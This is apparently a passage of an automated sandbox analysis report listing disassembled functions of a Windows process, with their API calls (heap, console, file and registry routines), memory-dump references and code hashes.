                                                                                                                                                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942AF82), ref: 00007FF6E942B715
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$AllocSize
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2549470565-0
                                                                                                                                                                        • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                                                                        • Instruction ID: d7072537c0516c7a496935c98e734932356321587ea3ed7546fa5a7b06870fbb
                                                                                                                                                                        • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B211F77A09782C6EA148F55E440278BAA5FF89B80B589431DA0E83754EF3DE849C709
                                                                                                                                                                        Function 00007FF6E944CFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6E943507A), ref: 00007FF6E944D01C
                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6E943507A), ref: 00007FF6E944D033
                                                                                                                                                                        • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6E943507A), ref: 00007FF6E944D06D
                                                                                                                                                                        • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6E943507A), ref: 00007FF6E944D07F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1033415088-0
                                                                                                                                                                        • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                                                                        • Instruction ID: 0bd1109ec152bb91007adf23513439937f33e269e154185c32b2bf1502d2d5ef
                                                                                                                                                                        • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                                                                        • Instruction Fuzzy Hash: 9D114C32618A42C6DB449F20B05427AB7A0FF8AB99F405135EA8E87B54DF3DD049CB04
                                                                                                                                                                        Function 00007FF6E94259E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E9431EA0: wcschr.MSVCRT(?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6E9450D54), ref: 00007FF6E9431EB3
                                                                                                                                                                        • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9425A2E
                                                                                                                                                                        • _open_osfhandle.MSVCRT ref: 00007FF6E9425A4F
                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF6E942260D), ref: 00007FF6E94437AA
                                                                                                                                                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF6E94437D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 22757656-0
                                                                                                                                                                        • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                                                                        • Instruction ID: f344c2a5420e7fc26c62ae9c4d372a9979713732cf21eb42542b7505db8790ad
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                                                                        • Instruction Fuzzy Hash: BF116D72A18645CBE7108F28E44833D7AA0FB89B64F648734DA2A873D0DF3ED449CB05
                                                                                                                                                                        Function 00007FF6E9445690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF6E9445433,?,?,?,00007FF6E94469B8,?,?,?,?,?,00007FF6E9438C39), ref: 00007FF6E94456C5
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E94456D9
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF6E9445433,?,?,?,00007FF6E94469B8,?,?,?,?,?,00007FF6E9438C39), ref: 00007FF6E94456FD
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E9445711
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                                                        • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                                                                        • Instruction ID: 67d30fe882b0f2402c607739c5c18ba23279a5c016b85e152fa12516c14bfebc
                                                                                                                                                                        • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                                                                        • Instruction Fuzzy Hash: 8D11F572A04B91C6EB008F56E4441ADBBB0FB89F84B598125DB4E43728EF38E45AC744
                                                                                                                                                                        Function 00007FF6E9439158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 140117192-0
                                                                                                                                                                        • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                                                                        • Instruction ID: 82cc835333b58ddb4b5ef44f61bc9ac8831998dc97b3b6812f151f29c402abf3
                                                                                                                                                                        • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                                                                        • Instruction Fuzzy Hash: BE21AF36918B45C5EB40AF94E88436973A4FF88B54F500136EA8D82764DF7EE488CB0A
                                                                                                                                                                        Function 00007FF6E9434AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E9434AD6
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E9434AEF
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A28
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A66
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A7D
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: memmove.MSVCRT(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A9A
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434AA2
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E943EE64
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E943EE78
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2759988882-0
                                                                                                                                                                        • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                                                                        • Instruction ID: a5950dd76105495b22b0fc352e10142c80102530ac2d1e3d05b86dbded8bf74c
                                                                                                                                                                        • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                                                                        • Instruction Fuzzy Hash: 5FF0E762E19A42C6EF159FB6A409279A9D1FF8EB41F48D434CD0EC2350EE3EA448C716
                                                                                                                                                                        Function 00007FF6E944F22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1606018815-0
                                                                                                                                                                        • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                                                                        • Instruction ID: a5ff23bcb7b88ae8f016aeaa4aefd8c70e51e0af63db0679426f06fcca59fd60
                                                                                                                                                                        • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                                                                        • Instruction Fuzzy Hash: 89F01533A24A82CBE7045F50E854279BA60FF8AB02F84A274DA0B42394DF3ED409CB05
                                                                                                                                                                        Function 00007FF6E94510D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
                                                                                                                                                                        • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF6E944827A), ref: 00007FF6E94511DC
                                                                                                                                                                        • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF6E944827A), ref: 00007FF6E9451277
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocProcessmemmovewcschr
                                                                                                                                                                        • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                        • API String ID: 1135967885-381716982
                                                                                                                                                                        • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                                                                        • Instruction ID: 276bad098e134de6ebefde919c95d23d835c0faf12cf5c20ce5b13ccb00d1860
                                                                                                                                                                        • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                                                                        • Instruction Fuzzy Hash: D371A4B3A08242C6E760CF55A48077976A5FF98798F404236DA5DC3B94DF3EE449CB0A
                                                                                                                                                                        Function 00007FF6E942E420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E94306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306D6
                                                                                                                                                                          • Part of subcall function 00007FF6E94306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306F0
                                                                                                                                                                          • Part of subcall function 00007FF6E94306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E943074D
                                                                                                                                                                          • Part of subcall function 00007FF6E94306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E9430762
                                                                                                                                                                          • Part of subcall function 00007FF6E942EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F000
                                                                                                                                                                          • Part of subcall function 00007FF6E942EF40: wcschr.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F031
                                                                                                                                                                          • Part of subcall function 00007FF6E942EF40: iswdigit.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F0D6
                                                                                                                                                                        • longjmp.MSVCRT ref: 00007FF6E943CCBC
                                                                                                                                                                        • longjmp.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E943CCE0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                        • API String ID: 3282654869-1994581435
                                                                                                                                                                        • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                                                                                        • Instruction ID: cfafd229ce108f261d93ffe96e69428ea2dcb7299ede38023392c4b26280f83d
                                                                                                                                                                        • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                                                                                        • Instruction Fuzzy Hash: 6861C173A19642C2FB299F71946437A6390BF457A4F544634CA1DC77E1EE3EE488C30A
                                                                                                                                                                        Function 00007FF6E94508EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memmovewcsncmp
                                                                                                                                                                        • String ID: 0123456789
                                                                                                                                                                        • API String ID: 3879766669-2793719750
                                                                                                                                                                        • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                                                                                        • Instruction ID: ff82efadd5f88beff8233fe58239060b5a598391a0dc0226e3c087432ec51566
                                                                                                                                                                        • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                                                                                        • Instruction Fuzzy Hash: BC41C1A7F1878AC1EB269F6694003BA6394FF54B80F445231DE4E87788EE3DD849C385
                                                                                                                                                                        Function 00007FF6E9449784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E94497D0
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D46E
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D485
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D4EE
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: iswspace.MSVCRT ref: 00007FF6E942D54D
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D569
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D58C
                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E94498D7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                                                                        • String ID: Software\Classes
                                                                                                                                                                        • API String ID: 2714550308-1656466771
                                                                                                                                                                        • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                                                                                        • Instruction ID: f0a8477d44ce5e31528fca6569aae0a394470fafc4f9bf7be85f2eb1d1e36b44
                                                                                                                                                                        • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                                                                                        • Instruction Fuzzy Hash: 0B419D23A19B12C1EA10DF1AD44523963A4FF85BD0F508131DA1E837E1EE3AD84AC74A
